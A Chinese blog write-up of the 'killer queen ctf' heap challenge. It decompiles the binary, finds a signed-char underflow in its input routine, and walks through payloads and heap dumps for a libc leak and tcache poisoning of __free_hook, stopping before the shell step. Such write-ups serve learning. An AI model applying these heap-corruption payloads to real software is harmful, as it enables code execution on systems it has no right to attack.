killer queen ctf

最新推荐文章于 2022-11-29 10:43:41 发布
最新推荐文章于 2022-11-29 10:43:41 发布
阅读量529 收藏
点赞数
分类专栏: 二进制漏洞 比赛复现 # glibc 2.31 文章标签: c++ c语言 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46441427/article/details/121296177
版权

SEARCHING

先看一下ida的main函数

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("All my homies hate fufu's.");
  puts("You can use my program, but don't be fufu.\n");
  while ( 1 )
  {
    v3 = menu();
    if ( v3 == 4 )
      break;
    if ( v3 <= 4 )
    {
      switch ( v3 )
      {
        case 3:
          reset();
          break;
        case 1:
          create();
          break;
        case 2:
          display();
          break;
      }
    }
  }
  puts("Bye.");
  _exit(0);
}

看一下create函数,create函数先读入了index,判断是不是0,只有index = 0才会进行工作,会free之前的chunk0,然后输入size分配一个新的chunk,然后用inbuf函数分配新的函数

int create()
{
  int v1; // [rsp+8h] [rbp-8h]
  int v2; // [rsp+Ch] [rbp-4h]

  puts("You now get to create a chunk.\n");
  puts("Which index would you like to create a chunk on?");
  v2 = inidx();
  if ( v2 < 0 || v2 > 0 )
    return puts("Invalid index.\n");
  free(*((void **)&chnk + v2));
  puts("What size chunk do you want?");
  v1 = inidx();
  if ( v1 <= 199 && v1 > 1000 )
    return puts("Invalid size.\n");
  *((_QWORD *)&chnk + v2) = malloc(v1);
  puts("Input content.");
  inbuf(*((_QWORD *)&chnk + v2), (unsigned int)v1);
  return puts("Chunk created.\n");
}

用inbuf读入输入的cotent,inbuf函数会逐步读入我们输入的字符。最后会以’\n’来结束,并且用一个null来终止我们的输入
这里就有个漏洞了,输入是byte类型,也就是-128到127

int __fastcall inbuf(__int64 a1, int a2)
{
  char i; // [rsp+1Fh] [rbp-1h]

  for ( i = 0; a2 > i; ++i )
  {
    *(_BYTE *)(i + a1) = getc(stdin);
    if ( *(_BYTE *)(i + a1) == 10 )
      break;
  }
  *(_BYTE *)(i + a1) = 0;
  return puts(&s);
}

这是display函数,然后输出

int display()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("You now get to display a chunk.\n");
  puts("Which index would you like to dispaly?");
  v1 = inidx();
  if ( v1 < 0 || v1 > 0 )
    return puts("Invalid index.\n");
  puts("Your chunk shows:");
  puts(*((const char **)&chnk + v1));
  return puts("\nChunk displayed.\n");
}

reset清空我们操作的chunk,这样可以防止free

int reset()
{
  int v1; // [rsp+Ch] [rbp-4h]

  puts("You now get to reset a chunk.\n");
  puts("Which index would you like to reset?");
  v1 = inidx();
  if ( v1 < 0 || v1 > 0 )
    return puts("Invalid index.\n");
  chnk[v1] = 0LL;
  return puts("Chunk reset.\n");
}

思路就是:
创造一个size为0x420的chunk
free它
创造overlap去泄露libc
创造三个chunk,两个free一个已分配

EXPLOITION

exp:
泄露libc
首先申请三个chunk,然后不管,反正已经分配了

create(0,0x10,b'aAA') <--- chunk D
create(0,0x40, b'VVV') <--- chunk E

create(0,0x90,"FFFFFF") <--- chunk F

通常如果要得到libc的地址会用unsorted bin。去malloc足够大的chunk,在free它的时候最终会进入unsorted bin。libc的地址会被放进fw和bk中,问题是我们现在free大的chunk时它周围没有其他chunk,并且top chunk会合并它
所以我们的想法是去申请足够的chunk让它们加起来的size比0x408多,然后用下溢改变第一个chunk的size为0x421并且free掉它。这样我们就会由至少一个chunk在我们修改size的fake chunk和 top chunk中,这样就不会合并

create(0,0x60,0x20*b'A') <----- chunk A. We will resize this one to 0x421
create(0,0x200,0x20*b'B') <---- chunk B. This one we will use to perform the underflow

create(0,0x70,0x70*b'C') 
reset(0)
create(0,0x70,0x70*b'C')
reset(0)
create(0,0x70,0x70*b'G')
reset(0)
payload= b'R'*16
payload += p64(0x420)
payload += p64(0x61)
payload += p64(0)
payload += p64(0)
create(0,0x70,payload) <------- chunk C. Inside this one we create a fake chunk to pass the chek for freeing into unsorted bin


reset(0)
payload = b'B' * 0x7e <------ payload to overflow char
payload += b"\x00" * 10 <-------- some padding so the next line lands on the size of chunk A
payload += p64(0x421) <----- this will overwrite the size of chunk A to 0x421 using the underflow
create(0,0x200,payload) <---- chunk B that is returned from tcache

所有在chunkC和chunkB的将会以至于当A被重新修改并且free的时候A + 0x420这个地址会指向我们控制的fake chunk

0x56257ccda3a0: 0x0000000000000000  0x0000000000000071 <--- chunk A
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010 
0x56257ccda3c0: 0x4141414141414141  0x4141414141414141
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B
0x56257ccda420: 0x4242424242424242  0x4242424242424242
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x0000000000000000  0x0000000000000000
0x56257ccda450: 0x0000000000000000  0x0000000000000000
0x56257ccda460: 0x0000000000000000  0x0000000000000000
0x56257ccda470: 0x0000000000000000  0x0000000000000000
0x56257ccda480: 0x0000000000000000  0x0000000000000000
0x56257ccda490: 0x0000000000000000  0x0000000000000000
0x56257ccda4a0: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000420  0x0000000000000061 <--- fake chunk to pass the check
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1 <--- top chunk

修改后

0x56257ccda3a0: 0x0000000000000000  0x0000000000000421 <--- chunk A that we resized using the underflow
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010
0x56257ccda3c0: 0x4141414141414141  0x4141414141414141
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211
0x56257ccda420: 0x4242424242424242  0x4242424242424242
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x0000424242424242
0x56257ccda4a0: 0x0000000000000000  0x0000000000000000
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000420  0x0000000000000061 
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

现在可以有0x421大小的chunk,我们可以free它,这样free了chunkA相当于free chunkB,所以在我们free之前,我们要malloc一下

create(0,0x60,0x8*b'F')
create(0,0xe0,b'WWWWWWWW')

这样就会把0x60的chunkA还回来,即使它现在是0x421,因为我们free的时候是0x70而且它存在tcache[0x70]中
然后申请0xe0
这样,内存分布为

0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1 <--- the new chunk size 0xe0 we just allocated
0x56257ccda3b0: 0x5757575757575757  0x00007f6a2f4adf00
0x56257ccda3c0: 0x000056257ccda3a0  0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B - still freed
0x56257ccda420: 0x0000000000000000  0x000056257ccda010
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x0000000000000331 <--- chunk A that shrunk 
0x56257ccda4a0: 0x00007f6a2f4adbe0  0x00007f6a2f4adbe0 <--- libc address we are trying to leak
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000330  0x0000000000000060
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

为什么选0xe0因为我们如果选大一点或者小一点的chunk下一步的exp就会失败,也是为了把libc地址压低一点,这样chunkA和chunkB就会overlap
现在我们malloc chunkB

payload = 0x80 * 'B'
create(0,0x200,payload)

现在我们mallocB回来,libc指针往下移动,然后我们可以写128个byte在chunkB里面,这样就是我们绕过inbuf的截断了。它就写在 0x56257ccda420 + local_9。local_9就是-128

0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1 
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010
0x56257ccda3c0: 0x000056257ccda3a0  0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B that we just malloced back from tcache
0x56257ccda420: 0x4242424242424242  0x4242424242424242 <--- the 0x80 or 128 Bs we wrote
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x4242424242424242 <--- chunk A that overlaps with chunk B
0x56257ccda4a0: 0x00007f6a2f4adbe0  0x00007f6a2f4adbe0 <--- pointers are still here
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252
0x56257ccda7c0: 0x0000000000000330  0x0000000000000060
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

然后可以泄露

display(0)

leak后的堆地址

0x56257ccda290: 0x0000000000000000  0x0000000000000021 <--- chunk D free
0x56257ccda2a0: 0x0000000000000000  0x000056257ccda010
0x56257ccda2b0: 0x0000000000000000  0x0000000000000051 <--- chunk E free
0x56257ccda2c0: 0x0000000000000000  0x000056257ccda010
0x56257ccda2d0: 0x0000000000000000  0x0000000000000000
0x56257ccda2e0: 0x0000000000000000  0x0000000000000000
0x56257ccda2f0: 0x0000000000000000  0x0000000000000000
0x56257ccda300: 0x0000000000000000  0x00000000000000a1 <--- chunk F free
0x56257ccda310: 0x0000000000000000  0x000056257ccda010
0x56257ccda320: 0x0000000000000000  0x0000000000000000
0x56257ccda330: 0x0000000000000000  0x0000000000000000
0x56257ccda340: 0x0000000000000000  0x0000000000000000
0x56257ccda350: 0x0000000000000000  0x0000000000000000
0x56257ccda360: 0x0000000000000000  0x0000000000000000
0x56257ccda370: 0x0000000000000000  0x0000000000000000
0x56257ccda380: 0x0000000000000000  0x0000000000000000
0x56257ccda390: 0x0000000000000000  0x0000000000000000
0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1 <--- chunk we used to push down the pointers size 0xe0
0x56257ccda3b0: 0x0000000000000000  0x000056257ccda010
0x56257ccda3c0: 0x000056257ccda3a0  0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000  0x0000000000000000
0x56257ccda3e0: 0x0000000000000000  0x0000000000000000
0x56257ccda3f0: 0x0000000000000000  0x0000000000000000
0x56257ccda400: 0x0000000000000000  0x0000000000000000
0x56257ccda410: 0x0000000000000000  0x0000000000000211 <--- chunk B
0x56257ccda420: 0x4242424242424242  0x4242424242424242
0x56257ccda430: 0x4242424242424242  0x4242424242424242
0x56257ccda440: 0x4242424242424242  0x4242424242424242
0x56257ccda450: 0x4242424242424242  0x4242424242424242
0x56257ccda460: 0x4242424242424242  0x4242424242424242
0x56257ccda470: 0x4242424242424242  0x4242424242424242
0x56257ccda480: 0x4242424242424242  0x4242424242424242
0x56257ccda490: 0x4242424242424242  0x4242424242424242 <--- chunk A
0x56257ccda4a0: 0x00007f6a2f4adbe0  0x00007f6a2f4adbe0
0x56257ccda4b0: 0x0000000000000000  0x0000000000000000
0x56257ccda4c0: 0x0000000000000000  0x0000000000000000
0x56257ccda4d0: 0x0000000000000000  0x0000000000000000
0x56257ccda4e0: 0x0000000000000000  0x0000000000000000
0x56257ccda4f0: 0x0000000000000000  0x0000000000000000
0x56257ccda500: 0x0000000000000000  0x0000000000000000
0x56257ccda510: 0x0000000000000000  0x0000000000000000
0x56257ccda520: 0x0000000000000000  0x0000000000000000
0x56257ccda530: 0x0000000000000000  0x0000000000000000
0x56257ccda540: 0x0000000000000000  0x0000000000000000
0x56257ccda550: 0x0000000000000000  0x0000000000000000
0x56257ccda560: 0x0000000000000000  0x0000000000000000
0x56257ccda570: 0x0000000000000000  0x0000000000000000
0x56257ccda580: 0x0000000000000000  0x0000000000000000
0x56257ccda590: 0x0000000000000000  0x0000000000000000
0x56257ccda5a0: 0x0000000000000000  0x0000000000000000
0x56257ccda5b0: 0x0000000000000000  0x0000000000000000
0x56257ccda5c0: 0x0000000000000000  0x0000000000000000
0x56257ccda5d0: 0x0000000000000000  0x0000000000000000
0x56257ccda5e0: 0x0000000000000000  0x0000000000000000
0x56257ccda5f0: 0x0000000000000000  0x0000000000000000
0x56257ccda600: 0x0000000000000000  0x0000000000000000
0x56257ccda610: 0x0000000000000000  0x0000000000000000
0x56257ccda620: 0x0000000000000000  0x0000000000000081
0x56257ccda630: 0x4343434343434343  0x4343434343434343
0x56257ccda640: 0x4343434343434343  0x4343434343434343
0x56257ccda650: 0x4343434343434343  0x4343434343434343
0x56257ccda660: 0x4343434343434343  0x4343434343434343
0x56257ccda670: 0x4343434343434343  0x4343434343434343
0x56257ccda680: 0x4343434343434343  0x4343434343434343
0x56257ccda690: 0x4343434343434343  0x4343434343434343
0x56257ccda6a0: 0x0000000000000000  0x0000000000000081
0x56257ccda6b0: 0x4343434343434343  0x4343434343434343
0x56257ccda6c0: 0x4343434343434343  0x4343434343434343
0x56257ccda6d0: 0x4343434343434343  0x4343434343434343
0x56257ccda6e0: 0x4343434343434343  0x4343434343434343
0x56257ccda6f0: 0x4343434343434343  0x4343434343434343
0x56257ccda700: 0x4343434343434343  0x4343434343434343
0x56257ccda710: 0x4343434343434343  0x4343434343434343
0x56257ccda720: 0x0000000000000000  0x0000000000000081
0x56257ccda730: 0x4747474747474747  0x4747474747474747
0x56257ccda740: 0x4747474747474747  0x4747474747474747
0x56257ccda750: 0x4747474747474747  0x4747474747474747
0x56257ccda760: 0x4747474747474747  0x4747474747474747
0x56257ccda770: 0x4747474747474747  0x4747474747474747
0x56257ccda780: 0x4747474747474747  0x4747474747474747
0x56257ccda790: 0x4747474747474747  0x4747474747474747
0x56257ccda7a0: 0x0000000000000000  0x0000000000000081 <--- chunk C
0x56257ccda7b0: 0x5252525252525252  0x5252525252525252 <--- fake chunk
0x56257ccda7c0: 0x0000000000000330  0x0000000000000060
0x56257ccda7d0: 0x0000000000000000  0x0000000000000000
0x56257ccda7e0: 0x0000000000000000  0x0000000000000000
0x56257ccda7f0: 0x0000000000000000  0x0000000000000000
0x56257ccda800: 0x0000000000000000  0x0000000000000000
0x56257ccda810: 0x0000000000000000  0x0000000000000000
0x56257ccda820: 0x0000000000000000  0x00000000000207e1

然后getshell

create(0,0x10,b'aAA')
create(0,0x40, b'VVV')

堆地址:

0x56257ccda290: 0x0000000000000000  0x0000000000000021 <--- chunk D. Free
0x56257ccda2a0: 0x0000000000000000  0x000056257ccda010
0x56257ccda2b0: 0x0000000000000000  0x0000000000000051 <--- chunk E. Malloc
0x56257ccda2c0: 0x0000000000565656  0x0000000000000000
0x56257ccda2d0: 0x0000000000000000  0x0000000000000000
0x56257ccda2e0: 0x0000000000000000  0x0000000000000000
0x56257ccda2f0: 0x0000000000000000  0x0000000000000000
0x56257ccda300: 0x0000000000000000  0x00000000000000a1 <--- chunk F. Free
0x56257ccda310: 0x0000000000000000  0x000056257ccda010
0x56257ccda320: 0x0000000000000000  0x0000000000000000
0x56257ccda330: 0x0000000000000000  0x0000000000000000
0x56257ccda340: 0x0000000000000000  0x0000000000000000
0x56257ccda350: 0x0000000000000000  0x0000000000000000
0x56257ccda360: 0x0000000000000000  0x0000000000000000
0x56257ccda370: 0x0000000000000000  0x0000000000000000
0x56257ccda380: 0x0000000000000000  0x0000000000000000
0x56257ccda390: 0x0000000000000000  0x0000000000000000
0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1

然后还利用下溢

payload = 0x80 * b'B' <--- 128 Bs to overflow char
payload += p64(0)
payload += p64(0x21) <--- size of D. We leave it as it was
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0x21) <--- size of E. We change it to 0x21>
create(0,0x90,payload) <--- chunk F from tcache>

修改后

0x56257ccda290: 0x0000000000000000  0x0000000000000021 <--- chunk D. Free
0x56257ccda2a0: 0x0000000000000000  0x0000000000000000
0x56257ccda2b0: 0x0000000000000000  0x0000000000000021 <--- chunk E. Free
0x56257ccda2c0: 0x0000000000000000  0x000056257ccda010
0x56257ccda2d0: 0x0000000000000000  0x0000000000000000
0x56257ccda2e0: 0x0000000000000000  0x0000000000000000
0x56257ccda2f0: 0x0000000000000000  0x0000000000000000
0x56257ccda300: 0x0000000000000000  0x00000000000000a1 <--- chunk F. Malloc
0x56257ccda310: 0x4242424242424242  0x4242424242424242
0x56257ccda320: 0x4242424242424242  0x4242424242424242
0x56257ccda330: 0x4242424242424242  0x4242424242424242
0x56257ccda340: 0x4242424242424242  0x4242424242424242
0x56257ccda350: 0x4242424242424242  0x4242424242424242
0x56257ccda360: 0x4242424242424242  0x4242424242424242
0x56257ccda370: 0x4242424242424242  0x4242424242424242
0x56257ccda380: 0x4242424242424242  0x4242424242424242
0x56257ccda390: 0x0000000000000000  0x0000000000000000
0x56257ccda3a0: 0x0000000000000000  0x00000000000000f1

这个时候chunkD在50,malloc回来再free去0x20,把chunkF申请回来0xa0,再次利用下溢出把chunkE的fd改成free_hook
这样,原本E->D变成E->free_hook
如图为修改过后的

0x56257ccda290: 0x0000000000000000  0x0000000000000021 <--- chunk D. Free
0x56257ccda2a0: 0x0000000000000000  0x0000000000000000 
0x56257ccda2b0: 0x0000000000000000  0x0000000000000021 <--- chunk E. Free. Poisoned with __free_hook
0x56257ccda2c0: 0x00007f6a2f4b0e70  0x000056257ccda000
0x56257ccda2d0: 0x0000000000000000  0x0000000000000000
0x56257ccda2e0: 0x0000000000000000  0x0000000000000000
0x56257ccda2f0: 0x0000000000000000  0x0000000000000000
